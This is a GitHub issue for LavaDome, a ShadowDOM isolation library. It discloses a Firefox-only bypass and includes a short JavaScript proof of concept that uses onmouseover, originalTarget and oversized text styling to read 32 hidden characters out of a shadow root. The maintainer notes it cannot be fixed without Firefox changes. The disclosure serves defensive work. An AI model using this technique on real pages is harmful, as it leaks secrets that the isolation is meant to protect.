LavaMoat / LavaDome

Secure DOM trees isolation and encapsulation leveraging ShadowDOM
https://lavamoat.github.io/LavaDome/packages/core/demo/
MIT License

LavaDome is vulnerable to onmouseover #37

Open weizman opened 2 months ago

weizman commented 2 months ago

Another one by @masatokinugawa (FF only):

```js
let foundChars = "";
PRIVATE.onmouseover = e => {
  const originalTarget = e.originalTarget;
  const host = originalTarget.parentNode.host;
  if (host && Array.from(host.parentElement.children).indexOf(host) === 0) {
    foundChars += originalTarget.innerText;
    console.log(foundChars);
    if (foundChars.length === 32) {
      alert(foundChars);
    }
    host.remove();
  }
}
PRIVATE.style.position = "absolute";
PRIVATE.style.top = "0";
PRIVATE.style.left = "0";
PRIVATE.style.padding = "0";
PRIVATE.style.margin = "0";
PRIVATE.style.fontFamily = "Consolas";
PRIVATE.style.letterSpacing = "100vw";
PRIVATE.style.fontSize = "100vw";
```

weizman commented 3 days ago

Can't think of a solution for this one. Firefox seems to insist on leaking information from within shadowDOMs through funnels I can't seem to understand. This one, like #15, really requires Firefox to adjust themselves for LavaDome to become secure against this.